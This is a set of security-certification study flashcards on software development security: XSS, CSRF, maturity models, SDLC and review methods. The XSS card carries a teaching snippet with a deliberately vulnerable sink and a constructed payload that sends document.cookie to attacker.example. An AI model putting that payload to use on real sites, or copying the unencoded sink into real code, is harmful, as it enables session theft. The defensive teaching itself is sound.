Chapter 8: Software Development Security Flashcards
What is XSS?
Cross-site scripting (XSS) is an injection attack in which attacker-supplied input is placed into a page served by a trusted website without proper output encoding, so the victim's browser executes the attacker's script in the trusted site's origin, with access to that site's cookies, DOM and session. In reflected XSS the payload travels in a crafted link that the attacker entices the user to click; in stored XSS the application saves the payload (a comment, a profile field) and serves it to every visitor.
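The following is an added illustration of the XSS card, not code from the flashcards or from any product. It runs under Node.js; the page template, the hostnames shop.example and attacker.example, and the payload are constructed for this example. It shows a reflected XSS sink, the same sink with output encoding, and why the encoding has to match the context the value lands in.

```javascript
// Added illustration for the XSS card above; not code from the flashcards.
// Runs under Node.js. The page template, hostnames and payload are constructed
// for this example.

// Encode a value for insertion into HTML element content or a double-quoted
// attribute value. These five characters are the ones that can alter the
// structure of the markup in those contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Reflected XSS: the search term from the URL is echoed into the page as-is.
// A victim who follows https://shop.example/search?q=<payload> gets the payload
// parsed as markup and executed in shop.example's origin, with their session.
function renderSearchVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// Fixed: same template, untrusted value encoded for the context it lands in.
// The browser shows the payload as text instead of interpreting it.
function renderSearchSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// Encoding is context-specific. Inside an inline <script>, entity encoding is
// the wrong tool: the value must be a valid JavaScript string literal, and a
// "</script>" inside it must not be able to close the script element early.
// JSON.stringify produces the literal; the extra replacement neutralises "</".
function renderInlineScriptSafe(query) {
  const literal = JSON.stringify(String(query)).replace(/<\//g, '<\\/');
  return `<script>var lastQuery = ${literal};</script>`;
}

// Constructed attacker payload: an element with an event handler, the usual
// shape when a filter only strips <script> tags.
const PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">';

console.log('vulnerable:', renderSearchVulnerable(PAYLOAD));   // payload is live markup
console.log('safe:      ', renderSearchSafe(PAYLOAD));         // payload is inert text
console.log('script ctx:', renderInlineScriptSafe('</script><img src=x onerror=alert(1)>'));
```

Output encoding at the point of insertion is the primary defence; a Content-Security-Policy that disallows inline script and a session cookie marked HttpOnly limit what a payload can do if an encoding step is missed.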
What is CSRF?
In a cross-site request forgery (CSRF) attack, an attacker lures a user who is already authenticated to a web application onto a page the attacker controls. That page makes the user's browser send a request to the application (for example by auto-submitting a hidden form), and the browser attaches the user's session cookie to it. Because the application cannot distinguish this forged request from one the user intended, it performs the action (a funds transfer, a password change) without the user's knowledge or consent.
What are the phases of RAD ?
Per CISSP, Rapid Application Development has 4 phases: Requirements Planning, User Design, Rapid Construction and Cutover.
What is the first stage of SW-CMM?
The first stage of the Software Capability Maturity Model:
Initial – The software process is characterized as ad hoc, and occasionally even chaotic. Few processes are defined, and success depends on individual effort and heroics.
What is the second stage of SW-CMM?
The second stage of the Software Capability Maturity Model:
Repeatable – Basic project management processes are established to track cost, schedule, & functionality. The necessary process discipline is in place to repeat earlier successes on projects with similar applications.
What is the third stage of SW-CMM?
The third stage of the Software Capability Maturity Model:
Defined – Software process for both management & engineering activities is documented, standardized, & integrated into all processes for the organization. All projects use the organization’s standard software process for developing & maintaining software.
What is the fourth stage of SW-CMM?
The fourth stage of the Software Capability Maturity Model:
Managed – Detailed measures of the software process & product quality are collected. The software process & products are quantitatively understood & controlled.
What is the fifth stage of SW-CMM?
The fifth stage of the Software Capability Maturity Model:
Optimizing – Continuous process improvement is enabled by quantitative feedback from the process & from piloting innovative ideas & technologies.
What is the “degree” of a database table?
The number of attributes (fields, i.e. columns) in the table. By contrast, the number of rows (tuples) is the table's cardinality.
List the steps for SDLC Software Development.
Planning, Requirements, System Analysis, Design, Development (coding), Testing, Deployment, Maintenance
What is Fagan Inspection?
A structured, formal process for identifying defects in software development documents, such as code, designs, and specifications. It proceeds through six phases: planning, overview, preparation, inspection (the meeting itself), rework, and follow-up. The process is named after Michael Fagan, who is credited with inventing formal software inspections.
Which is an asynchronous review process: Pass-around Reviews, or Team Review?
Pass-around. Reviewers examine the artifact independently and return their comments on their own schedule, so no meeting is needed; a team review is a scheduled, synchronous meeting.
What is SOAR?
Security orchestration, automation and response: platforms that collect alerts from security tools and run automated playbooks to triage and respond to them, reducing manual effort in the SOC.
What is a CAB in software development?
Change Advisory Board: the group that reviews, approves or rejects proposed changes as part of the change management process.
What is a PERT chart?
Program Evaluation and Review Technique chart, often used at the beginning of a project to identify obstacles, prioritize tasks, and estimate how long each step will take. It maps tasks and their dependencies so the overall schedule and the critical path can be estimated.